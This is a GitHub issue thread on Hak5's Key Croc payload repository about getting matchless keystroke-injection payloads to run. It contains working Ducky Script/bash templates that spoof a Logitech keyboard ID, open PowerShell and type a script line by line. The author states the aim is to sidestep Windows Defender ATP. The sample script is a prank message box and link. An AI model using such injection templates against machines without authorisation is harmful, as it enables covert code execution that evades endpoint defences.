hak5 / keycroc-payloads

The Official Key Croc Payload Repository
https://shop.hak5.org/products/key-croc

Compatibility with bashbunny (matchless) payloads #11

Open floyd-fuh opened 4 years ago

floyd-fuh commented 4 years ago

Hi there,

I have a Key Croc and I like it, and I was wondering what the compatibility with my old Bash Bunny payloads is like. And what about language files for the keyboard: is there a reason why not all of the ones from the Bash Bunny payload git are included in the Key Croc repo?

cheers, floyd

hak5darren commented 4 years ago

There is quite a bit of overlap between the Hak5 language that is Ducky Script for the Bash Bunny and the Key Croc. Some simple payloads may indeed be copy/paste jobs. They're both interpreting with Bash at the core, and a set of Ducky Script commands on top of that. This page will show which commands are available for which products: https://docs.hak5.org/hc/en-us/articles/360049449314-Ducky-Script-Command-Reference

The reason the Bash Bunny and Key Croc have different language files is because the Key Croc uses an inverted key value pair to determine which key was pressed, and includes several aliases as it relates to multiple combinations and duplicates of keys. For instance, if someone presses ALT-ENTER, is that using the ALT key on the left, or the right? And don't forget, there's an ENTER key on the numpad too. That's just one small example - but it gets long and complex quickly.

floyd-fuh commented 4 years ago

Thanks for the info, that's helpful to have that overview of commands supported.

I was just trying to run the Key Croc like a Bash Bunny (without a MATCH rule), but for some reason this doesn't work (I don't plug a keyboard into the Key Croc):

```bash
ATTACKMODE HID

LED SETUP

# Path of the temporary file that gets typed out line by line
# (this assignment was missing from the pasted version; $FILE is used below)
FILE="/tmp/tmp_powershell_script.txt"

# File to type
cat <<'EOF' > "$FILE"
start "https://www.youtube.com/watch?v=ub82Xb1C8os"
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$oReturn=[System.Windows.Forms.Messagebox]::Show("Deleted C:\Windows\system32\ :)")
exit
EOF

# run payload with powershell
Q GUI r
Q DELAY 200
Q STRING powershell
Q ENTER
Q DELAY 500

# bail out (and signal it on the LED) if the here-doc was not written
if [ ! -f "$FILE" ]
then
    Q STRING echo \"File not found\"
    LED ERROR
    Q DELAY 5000
    exit
fi
Q ENTER

# type the file into the PowerShell prompt one line at a time
while IFS= read -r line
do
    LED B
    Q STRING "$line"
    Q ENTER
    LED W
    Q DELAY 200
done < "$FILE"

LED G
```

It's a generic script that would type the here-doc line by line into PowerShell (better to circumvent things like Windows Defender ATP). We would contribute it to the library, but it only works for me on the Bash Bunny. Any idea why not on the Key Croc? The only idea I have is that there is no "MATCH" command (unlike in all the examples in the library of Key Croc); could that be it?

hak5darren commented 4 years ago

Try it interactively. I suspect the ATTACKMODE HID at the top is part of the problem - as well as a possible race condition at boot. The Key Croc boots by default in ATTACKMODE HID with the VID and PID cloned - however the execution order is to run the matchless payload before this is done.

It could be as simple as removing the ATTACKMODE HID command and adding a sleep, or checking the /tmp/mode or /tmp/vidpid file to see that the Key Croc has fully booted and entered ATTACKMODE HID before continuing with your payload.

I'm tagging @dallaswinger here who wrote the framework and can give you a more thorough answer.
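One way to apply the suggestion above in a matchless payload, as an added example that is neither hak5darren's code nor part of the Key Croc framework: instead of re-issuing `ATTACKMODE HID`, the payload polls `/tmp/mode` and `/tmp/vidpid` and only starts typing once the device reports HID. The exact contents of those files are not documented in this thread, so the pattern `HID` and the "non-empty vidpid file" check are assumptions to adjust against a real device.

```bash
#!/bin/bash
# Added example (not from the Key Croc framework): gate a matchless payload on the
# device having finished booting into ATTACKMODE HID, instead of re-running
# ATTACKMODE HID at the top and racing the framework's own setup.
# ASSUMPTION: /tmp/mode contains the word "HID" once HID mode is active, and
# /tmp/vidpid is non-empty once the cloned VID/PID has been written.
MODE_FILE="${MODE_FILE:-/tmp/mode}"
VIDPID_FILE="${VIDPID_FILE:-/tmp/vidpid}"

# wait_for_file_match FILE PATTERN TIMEOUT_SECS [INTERVAL_SECS]
# Polls FILE until it is readable and a line matches PATTERN (grep -E).
# Returns 0 on match, 1 on timeout, so the caller can choose between
# continuing and LED ERROR rather than typing into nothing.
wait_for_file_match() {
    local file="$1" pattern="$2" timeout="$3" interval="${4:-1}"
    local deadline=$(( $(date +%s) + timeout ))
    while :; do
        if [ -r "$file" ] && grep -qE -- "$pattern" "$file" 2>/dev/null; then
            return 0
        fi
        if [ "$(date +%s)" -ge "$deadline" ]; then
            return 1
        fi
        sleep "$interval"
    done
}

# hid_ready TIMEOUT_SECS: true once /tmp/mode reports HID and /tmp/vidpid exists.
hid_ready() {
    wait_for_file_match "$MODE_FILE" 'HID' "$1" && [ -s "$VIDPID_FILE" ]
}

# Sketch of how a payload.txt would use the gate (replace the ATTACKMODE line):
#   if hid_ready 30; then
#       LED ATTACK
#       Q GUI r
#       # ... rest of the typing payload ...
#   else
#       LED ERROR
#       exit 1
#   fi
```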

floyd-fuh commented 4 years ago

I have tried a lot of configurations now, including combinations of:

I have tried so many things by now and I'm still unsure which combinations work. However, for now the following combination seems to work:

```bash
ATTACKMODE HID VID_0X046d PID_0X0203 MAN_Logitech SN_0 PROD_M2452_Keyboard

FILE="/tmp/tmp_powershell_script.txt"

# File to type
cat <<'EOF' > "$FILE"
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$oReturn=[System.Windows.Forms.Messagebox]::Show("Deleted C:\Windows\system32\ :)")
start "https://www.youtube.com/watch?v=ub82Xb1C8os"
exit
EOF

# run payload with powershell
LED ATTACK

Q GUI r
Q DELAY 200
Q STRING powershell
Q ENTER
Q DELAY 500

# bail out (and signal it on the LED) if the here-doc was not written
if [ ! -f "$FILE" ]
then
    Q STRING echo \"File not found\"
    LED ERROR
    Q DELAY 5000
    exit
fi
Q ENTER

# type the file into the PowerShell prompt one line at a time
while IFS= read -r line
do
    LED STAGE1
    Q STRING "$line"
    Q ENTER
    LED STAGE3
    Q DELAY 200
done < "$FILE"

LED FINISH
```

I think it would be helpful if you could add some Key Croc how-tos that have matchless payloads; there are none in the library, and I don't think it works when you specify VID or PID in config.txt (but as said, I'm unsure about the exact mechanics). I think config.txt must be pretty empty to do matchless payloads.

Btw, I think it would be awesome to have a linter/script that can run on a PC and check config.txt and payload.txt for syntax errors and combinations of configurations that are not a good match.

konstantingoretzki commented 2 years ago

Looks like currently (version 1.3_510) the detection, and therefore the execution, of matchless payloads is broken. This fix helped me get it working: https://forums.hak5.org/topic/55695-fix-for-matchless-payloads-not-running/ There are also some explanations of the conditions under which the fix will / won't work.